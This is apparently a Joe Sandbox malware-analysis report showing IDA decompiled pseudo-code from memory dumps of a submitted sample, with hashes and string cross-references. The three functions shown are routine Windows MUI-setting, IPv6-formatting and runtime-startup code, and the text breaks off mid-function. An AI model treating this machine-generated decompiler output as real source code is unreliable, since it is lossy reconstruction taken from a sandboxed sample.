                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                        • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                        • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                        • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00888788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E00888788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00888460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0086E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0088718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00888460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0088718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00888460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00888460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00888460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0088718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0086E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00862340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0087E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0086E2A8(_t322,  &_v68, _v16);
								if(E00885553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0087E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0086E2A8(_t322,  &_v68, _t236);
								if(E00885553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0088718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0086E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00862340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0087E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0086E2A8(_v12,  &_v68, _v16);
							if(E00885553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0087E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0086E2A8(_t322,  &_v68, _t269);
							if(E00885553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0088718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0086E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00862340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0087E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0086E2A8(_v12,  &_v68, _v16);
						if(E00885553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0087E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0086E2A8(_t322,  &_v68, _t296);
						if(E00885553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0086E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                        0x00888788
                                                        0x00888788
                                                        0x00888791
                                                        0x00888794
                                                        0x00888798
                                                        0x0088879b
                                                        0x0088879e
                                                        0x008887a1
                                                        0x008887a4
                                                        0x008887a7
                                                        0x008887aa
                                                        0x008887af
                                                        0x008d1ad3
                                                        0x00888b0a
                                                        0x00888b0d
                                                        0x00888b13
                                                        0x00888b19
                                                        0x00888b1f
                                                        0x00888b25
                                                        0x00888b2b
                                                        0x00888b31
                                                        0x00888b37
                                                        0x00888b3d
                                                        0x00888b46
                                                        0x00888b46
                                                        0x008887c6
                                                        0x008887d0
                                                        0x008d1ae0
                                                        0x008d1ae6
                                                        0x008d1af8
                                                        0x008d1af8
                                                        0x008d1afd
                                                        0x008d1afe
                                                        0x008d1b01
                                                        0x008d1b06
                                                        0x008d1b06
                                                        0x008887d6
                                                        0x008887f2
                                                        0x008887f7
                                                        0x00888807
                                                        0x0088880a
                                                        0x0088880f
                                                        0x00888810
                                                        0x00888813
                                                        0x00888818
                                                        0x00888818
                                                        0x0088882c
                                                        0x00888831
                                                        0x00888838
                                                        0x00888908
                                                        0x00888920
                                                        0x008889f0
                                                        0x00888a08
                                                        0x00888af6
                                                        0x00888af6
                                                        0x00888af8
                                                        0x00888afb
                                                        0x008d1beb
                                                        0x008d1beb
                                                        0x00888b04
                                                        0x008d1bf8
                                                        0x008d1c0e
                                                        0x008d1c13
                                                        0x008d1c16
                                                        0x008d1c16
                                                        0x008d1bf8
                                                        0x00000000
                                                        0x00888b04
                                                        0x00888a0e
                                                        0x00888a11
                                                        0x00888a14
                                                        0x00888a15
                                                        0x00888a18
                                                        0x00888a22
                                                        0x00888b59
                                                        0x00888a28
                                                        0x00888a3c
                                                        0x00888a3c
                                                        0x00888a42
                                                        0x008d1bb0
                                                        0x008d1b11
                                                        0x008d1b11
                                                        0x00000000
                                                        0x00888a48
                                                        0x00888a51
                                                        0x00888a5b
                                                        0x00888a5e
                                                        0x00888a61
                                                        0x00888a69
                                                        0x00888a69
                                                        0x00888a6d
                                                        0x00000000
                                                        0x00000000
                                                        0x00888a74
                                                        0x00888a7c
                                                        0x00888a7d
                                                        0x00888a91
                                                        0x00888a93
                                                        0x00888a93
                                                        0x00888a98
                                                        0x00888a9b
                                                        0x00888aa1
                                                        0x00888aa1
                                                        0x00888aa4
                                                        0x00888aaa
                                                        0x00888ab1
                                                        0x00888ac5
                                                        0x00888ac7
                                                        0x00888ac7
                                                        0x00888ac5
                                                        0x00888ace
                                                        0x008d1bc9
                                                        0x008d1bce
                                                        0x008d1bd2
                                                        0x008d1bd2
                                                        0x00888ad8
                                                        0x00888aeb
                                                        0x00888aeb
                                                        0x00888af0
                                                        0x00888af4
                                                        0x00000000
                                                        0x00888af4
                                                        0x00888a42
                                                        0x00888926
                                                        0x00888929
                                                        0x0088892c
                                                        0x0088892d
                                                        0x00888930
                                                        0x00888935
                                                        0x0088893a
                                                        0x00888b51
                                                        0x00888940
                                                        0x00888954
                                                        0x00888954
                                                        0x0088895a
                                                        0x008d1b63
                                                        0x00000000
                                                        0x00888960
                                                        0x00888969
                                                        0x00888973
                                                        0x00888976
                                                        0x00888979
                                                        0x0088897e
                                                        0x00888981
                                                        0x00888981
                                                        0x00888986
                                                        0x00000000
                                                        0x00000000
                                                        0x008d1b6e
                                                        0x008d1b74
                                                        0x008d1b7b
                                                        0x008d1b8f
                                                        0x008d1b91
                                                        0x008d1b91
                                                        0x008d1b99
                                                        0x008d1b9c
                                                        0x008d1ba2
                                                        0x008d1ba2
                                                        0x0088898c
                                                        0x00888992
                                                        0x00888999
                                                        0x008889ad
                                                        0x008d1ba8
                                                        0x008d1ba8
                                                        0x008889ad
                                                        0x008889b6
                                                        0x008889c8
                                                        0x008889cd
                                                        0x008889d0
                                                        0x008889d0
                                                        0x008889d6
                                                        0x008889e8
                                                        0x008889e8
                                                        0x008889ed
                                                        0x00000000
                                                        0x008889ed
                                                        0x0088895a
                                                        0x0088883e
                                                        0x00888841
                                                        0x00888844
                                                        0x00888845
                                                        0x00888848
                                                        0x0088884d
                                                        0x00888852
                                                        0x00888b49
                                                        0x00888858
                                                        0x0088886c
                                                        0x0088886c
                                                        0x00888872
                                                        0x008d1b0e
                                                        0x00000000
                                                        0x00888878
                                                        0x00888881
                                                        0x0088888b
                                                        0x0088888e
                                                        0x00888891
                                                        0x00888896
                                                        0x00888899
                                                        0x00888899
                                                        0x0088889e
                                                        0x00000000
                                                        0x00000000
                                                        0x008d1b21
                                                        0x008d1b27
                                                        0x008d1b2e
                                                        0x008d1b42
                                                        0x008d1b44
                                                        0x008d1b44
                                                        0x008d1b4c
                                                        0x008d1b4f
                                                        0x008d1b55
                                                        0x008d1b55
                                                        0x008888a4
                                                        0x008888aa
                                                        0x008888b1
                                                        0x008888c5
                                                        0x008d1b5b
                                                        0x008d1b5b
                                                        0x008888c5
                                                        0x008888ce
                                                        0x008888e0
                                                        0x008888e5
                                                        0x008888e8
                                                        0x008888e8
                                                        0x008888ee
                                                        0x00888900
                                                        0x00888900
                                                        0x00888905
                                                        0x00000000
                                                        0x00888905

                                                        APIs
                                                        Strings
                                                        • Kernel-MUI-Language-Allowed, xrefs: 00888827
                                                        • Kernel-MUI-Number-Allowed, xrefs: 008887E6
                                                        • Kernel-MUI-Language-SKU, xrefs: 008889FC
                                                        • WindowsExcludedProcs, xrefs: 008887C1
                                                        • Kernel-MUI-Language-Disallowed, xrefs: 00888914
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: _wcspbrk
                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                        • API String ID: 402402107-258546922
                                                        • Opcode ID: 4edefa3331bccce3174db55b66fdb60262bb28b6008e48f1faa7591f49128b23
                                                        • Instruction ID: 70d85cbc0ef58c11514611eed98c6548fc392ea83c2fb1751cabb40f5db0d175
                                                        • Opcode Fuzzy Hash: 4edefa3331bccce3174db55b66fdb60262bb28b6008e48f1faa7591f49128b23
                                                        • Instruction Fuzzy Hash: C4F107B6D00209EFCF11EF98C9859EEBBB8FF08304F55446AE505E7211EB349A45DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 008A13CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 38%
                                                        			E008A13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00897707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x862926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00897707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x869cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00897707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00897707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00897707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00897707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                        0x008a13d5
                                                        0x008a13d9
                                                        0x008a13dc
                                                        0x008a13de
                                                        0x008a13e1
                                                        0x008a13e8
                                                        0x008a13ee
                                                        0x008ce8fd
                                                        0x00000000
                                                        0x008ce921
                                                        0x008ce921
                                                        0x008ce928
                                                        0x008ce982
                                                        0x008ce98a
                                                        0x00000000
                                                        0x008ce99a
                                                        0x008ce99e
                                                        0x008ce9a3
                                                        0x008ce9a8
                                                        0x008ce9b9
                                                        0x008ce978
                                                        0x00000000
                                                        0x008ce978
                                                        0x008ce98a
                                                        0x008ce92a
                                                        0x008ce931
                                                        0x008ce944
                                                        0x008ce944
                                                        0x008ce950
                                                        0x008ce954
                                                        0x008ce959
                                                        0x008ce95e
                                                        0x008ce963
                                                        0x008ce970
                                                        0x00000000
                                                        0x008ce975
                                                        0x008ce93b
                                                        0x008ce980
                                                        0x00000000
                                                        0x008ce980
                                                        0x008ce942
                                                        0x008ce94b
                                                        0x00000000
                                                        0x008ce94b
                                                        0x00000000
                                                        0x008ce942
                                                        0x008a13f4
                                                        0x008a13f4
                                                        0x008a13f9
                                                        0x008a13fc
                                                        0x008a13ff
                                                        0x008a1406
                                                        0x008ce9cc
                                                        0x008ce9d2
                                                        0x008ce9d2
                                                        0x008ce9cc
                                                        0x008a140c
                                                        0x008a1411
                                                        0x008a1431
                                                        0x008a143a
                                                        0x008a143c
                                                        0x008a143f
                                                        0x008a143f
                                                        0x008a1442
                                                        0x008a1447
                                                        0x008a14a8
                                                        0x008a14ac
                                                        0x008ce9e2
                                                        0x008ce9e7
                                                        0x008ce9ec
                                                        0x008cea05
                                                        0x008cea05
                                                        0x00000000
                                                        0x008a1449
                                                        0x00000000
                                                        0x008a1449
                                                        0x008a144c
                                                        0x008a1459
                                                        0x008a1462
                                                        0x008a1469
                                                        0x008a146a
                                                        0x008a1470
                                                        0x008a1473
                                                        0x008a1476
                                                        0x008a1476
                                                        0x008a1490
                                                        0x008a1495
                                                        0x008a138e
                                                        0x008a1390
                                                        0x008a1397
                                                        0x008a1398
                                                        0x008a1399
                                                        0x008a13a1
                                                        0x008a13a4
                                                        0x008a13a4
                                                        0x008a1498
                                                        0x008a149c
                                                        0x008a149f
                                                        0x008a14a2
                                                        0x00000000
                                                        0x00000000
                                                        0x008a14a4
                                                        0x00000000
                                                        0x008a14a4
                                                        0x008a1413
                                                        0x008a1415
                                                        0x008a1416
                                                        0x008a1419
                                                        0x008a141c
                                                        0x008a1422
                                                        0x008a13b7
                                                        0x008a13bc
                                                        0x008a13bf
                                                        0x008a13bf
                                                        0x008a13c2
                                                        0x008a1424
                                                        0x008a1424
                                                        0x008a1424
                                                        0x008a1427
                                                        0x008a142b
                                                        0x008a142c
                                                        0x008a142c
                                                        0x008a142c
                                                        0x00000000
                                                        0x008a141c
                                                        0x008a1411

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                        • Associated: 00000006.00000002.1032375149.0000000000840000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032524521.0000000000930000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032531456.0000000000940000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032540140.0000000000944000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032546490.0000000000947000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032556961.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.1032605363.00000000009B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_840000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 63d466d6b2867ee6a37c342849f389f37aebfac8de9b743c3109e2ce88eb23b4
                                                        • Instruction ID: 90fe10c7d3d4450449a81cc4e7d0318fe880d573ab505f3de22f70b93a69ba56
                                                        • Opcode Fuzzy Hash: 63d466d6b2867ee6a37c342849f389f37aebfac8de9b743c3109e2ce88eb23b4
                                                        • Instruction Fuzzy Hash: 59613671914655BADF24DF9DC8848BEBBB6FF99300B18C02DE4D6C7A40D278AA40CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B38A8 Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 85%
                                                        			E013B38A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				void** _t105;
				void** _t106;
				void** _t109;
				signed char _t111;
				long _t119;
				void* _t129;
				signed int* _t133;
				void* _t135;
				signed int* _t138;
				void** _t139;
				void* _t141;
				signed int _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0x13c2260);
				E013B2400(__ebx, __edi, __esi);
				E013B442F(0xb);
				 *(_t155 - 4) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E013B4869();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0x13c4848 = _t82;
					 *0x13c50e4 = _t141;
					while(_t133 <  &(_t82[0x200])) {
						_t133[1] = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						_t133[2] = 0;
						_t133[9] = _t133[9] & 0x00000080;
						_t133[9] = _t133[9] & 0x0000007f;
						_t133[9] = 0xa0a;
						_t133[0xe] = 0;
						_t133[0xd] = 0;
						_t133 =  &(_t133[0x10]);
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0x13c4848; // 0x0
					}
					GetStartupInfoW(_t155 - 0x74);
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							if(_t142 >= 3) {
								break;
							}
							_t147 =  *0x13c4848 + (_t142 << 6);
							 *(_t155 - 0x24) = _t147;
							if( *_t147 == 0xffffffff ||  *_t147 == _t129) {
								_t147[1] = 0x81;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								if(_t91 == 0xffffffff || _t91 == 0) {
									L45:
									_t147[1] = _t147[1] | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0x13c6100;
									if(_t94 != 0) {
										 *( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10) = _t129;
									}
									goto L47;
								} else {
									_t98 = GetFileType(_t91);
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									if(_t99 != 2) {
										if(_t99 != 3) {
											L44:
											_t71 =  &(_t147[3]); // -20727868
											E013B40A2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											_t147[2] = _t147[2] + 1;
											goto L47;
										}
										_t103 = _t147[1] | 0x00000008;
										L43:
										_t147[1] = _t103;
										goto L44;
									}
									_t103 = _t147[1] | 0x00000040;
									goto L43;
								}
							} else {
								_t147[1] = _t147[1] | 0x00000080;
								L47:
								_t142 = _t142 + 1;
								continue;
							}
						}
						 *(_t155 - 4) = _t129;
						E013B3B53();
						_t86 = 0;
						L49:
						return E013B2445(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 =  &(_t105[1]);
					 *(_t155 - 0x28) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					 *(_t155 - 0x30) = 1;
					while( *0x13c50e4 < _t135) {
						_t138 = E013B4869(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						if(_t138 != 0) {
							0x13c4848[_t149] = _t138;
							 *0x13c50e4 =  *0x13c50e4 + _t141;
							while(_t138 <  &(0x13c4848[_t149][0x200])) {
								_t138[1] = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								_t138[2] = 0;
								_t138[9] = _t138[9] & 0x00000080;
								_t138[9] = 0xa0a;
								_t138[0xe] = 0;
								_t138[0xd] = 0;
								_t138 =  &(_t138[0x10]);
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0x13c50e4;
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *(_t155 - 0x28);
					_t139 =  *(_t155 - 0x20);
					while(_t143 < _t135) {
						_t150 =  *_t139;
						if(_t150 == 0xffffffff || _t150 == _t129) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  &(( *(_t155 - 0x28))[0]);
							 *(_t155 - 0x28) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						} else {
